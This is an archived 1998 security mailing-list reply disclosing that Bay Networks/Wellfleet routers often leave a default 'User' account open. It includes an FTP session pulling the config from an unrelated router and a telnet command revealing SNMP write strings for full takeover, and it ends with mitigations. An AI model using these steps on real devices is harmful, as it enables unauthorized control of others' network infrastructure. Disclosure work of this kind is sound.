mailing list archives
Re: Bay Networks Security Hole
From: jason () VIACCESS NET (Jason Ackley)
Date: Sun, 10 May 1998 11:02:41 -0400
On Sun, 10 May 1998, Marty Rigaletto wrote:
vendor: bay networks
product: bay access node/wellfleet routers
on the machine is passworded by the administrator, however, the "User"
account is often left untouched. While the "User" account has restricted
This is something I mentioned to them about 1yr ago, with no word /
Even if the box is not doing filtering and such, the 'User' Account can
be used to ftp into the Bay router (they run ftp daemons), download the
configuration file (yes, I have done this many times..), and then read it
into their Managment program, in which you will have the snmp read/write
strings to do whatever you want with! Basically if the 'User' account is
open, the router can be taken over with very little effort..Once you load
up the config file into the managment console, you could toggle T1s, down
interfaces, reset BGP tables, capture packets.. You name it.
It would be wise to make it where the 'User' account cannot ftp in, or
cannot read the contents of the flash card..
Here is a sample random-bay-router-on-the-net(IP addr changed of course):
llama:/usr/home/jason/doc# ftp 22.214.171.124
Connected to 126.96.36.199.
220 WfFTP server(x12.00) ready.
Name (188.8.131.52:jason): User
230 User User logged in.
200 Type set to I.
ftp> get config
local: config remote: config
200 PORT command successful.
150 Image data connection for 2:config (184.108.40.206,20) (50140 bytes).
226 Binary Transfer Complete.
50140 bytes received in 2.01 seconds (24909 bytes/s)
200 PORT command successful.
150 ASCII data connection for 2: (220.127.116.11,0) (0 bytes).
Volume - drive 2:
Directory of 2:
File Name Size Date Day Time
config.isp 45016 08/22/97 Fri. 17:05:51
startup.cfg 7472 08/24/97 Sun. 23:31:31
asnboot.exe 237212 08/24/97 Sun. 23:31:41
asndiag.exe 259268 08/24/97 Sun. 23:32:28
debug.al 12372 08/24/97 Sun. 23:33:17
ti_asn.cfg 504 08/24/97 Sun. 23:33:31
install.bat 189114 08/24/97 Sun. 23:33:41
config 50140 04/20/98 Mon. 22:08:01
4194304 bytes - Total size
3375190 bytes - Available free space
3239088 bytes - Contiguous free space
226 ASCII Transfer Complete.
I have no idea what the current firmware rev is, as my current duties have
me away from Bay products, but in this example, the firmware was 12.00 it
looks like.. (This was testing 'just now').
All a proposed attacker would have to do is telnet to the router, login
as "User", and issue a single command, "sho snmp community". Then adjust
his or her snmp software to use that string and IP address, and b00m,
sucks to be you.
As far as I knew, the User level could not see the read/write string, but
I could be outdated..But as shown above, you can get the config file using
a standard FTP client :)
The Fix? Well, as I said , tighten down what the 'User Level' account can
do, and leave things such as ftpd turned off by default. Of course,
removing the 'User' account would be a good idea too, as not too many
people use it and even more people are not even aware of it..
Jason Ackley jason () ackley net
UNIX Systems Consultant
"Learn UNIX and mingle with the gods.."
- Re: 3Com switches - undocumented access level.), (continued)